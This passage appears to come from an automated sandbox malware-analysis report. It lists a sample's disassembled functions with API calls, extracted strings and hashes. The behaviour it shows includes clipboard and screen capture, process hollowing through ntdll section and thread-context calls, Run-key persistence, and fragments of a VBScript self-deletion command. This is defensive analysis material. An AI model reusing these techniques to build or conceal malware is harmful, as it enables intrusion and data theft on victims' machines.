                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                    Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 0040B74C
                                    • GetClipboardData.USER32(0000000D), ref: 0040B758
                                    • CloseClipboard.USER32 ref: 0040B760
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                    • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                    • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                    • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                    Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-3916222277
                                    • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                    • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                    • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                    • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                    Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                    • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                    • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                    • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                    Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: JD
                                    • API String ID: 1084509184-2669065882
                                    • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                    • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                    • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                    • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                    Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                    • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                    • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                    • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                    Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                    • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                    • Opcode Fuzzy Hash: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                    • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                    Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                    • String ID:
                                    • API String ID: 1663032902-0
                                    • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                    • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                    • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                    • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                    Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$InfoLocale_abort_free
                                    • String ID:
                                    • API String ID: 2692324296-0
                                    • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                    • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                    • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                    • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                    Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                    • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                    • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                    • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                    Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                    • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                    • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                    • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                    • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                    Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                    • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                    • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                    • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                    Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                    • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                    Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                    • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                    • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                    • Instruction Fuzzy Hash:
                                    Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                      • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                    • DeleteDC.GDI32(00000000), ref: 00418F68
                                    • DeleteObject.GDI32(00000000), ref: 00418F6B
                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                    • DeleteDC.GDI32(00000000), ref: 00418F9D
                                    • DeleteDC.GDI32(00000000), ref: 00418FA0
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                    • GetIconInfo.USER32(?,?), ref: 00418FF8
                                    • DeleteObject.GDI32(?), ref: 00419027
                                    • DeleteObject.GDI32(?), ref: 00419034
                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                    • DeleteDC.GDI32(?), ref: 004191B7
                                    • DeleteDC.GDI32(00000000), ref: 004191BA
                                    • DeleteObject.GDI32(00000000), ref: 004191BD
                                    • GlobalFree.KERNEL32(?), ref: 004191C8
                                    • DeleteObject.GDI32(00000000), ref: 0041927C
                                    • GlobalFree.KERNEL32(?), ref: 00419283
                                    • DeleteDC.GDI32(?), ref: 00419293
                                    • DeleteDC.GDI32(00000000), ref: 0041929E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                    • String ID: DISPLAY
                                    • API String ID: 479521175-865373369
                                    • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                    • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                    • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                    • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                    Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                    • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                    • ResumeThread.KERNEL32(?), ref: 00418470
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                    • GetLastError.KERNEL32 ref: 004184B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                    • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                    • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                    • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                    Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                      • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                      • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                      • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                    • ExitProcess.KERNEL32 ref: 0040D80B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-1447701601
                                    • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                    • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                    • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                    • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                    Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                      • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                      • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                      • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                    • ExitProcess.KERNEL32 ref: 0040D454
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                    • API String ID: 3797177996-2483056239
                                    • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                    • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                    • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                    • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                    Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
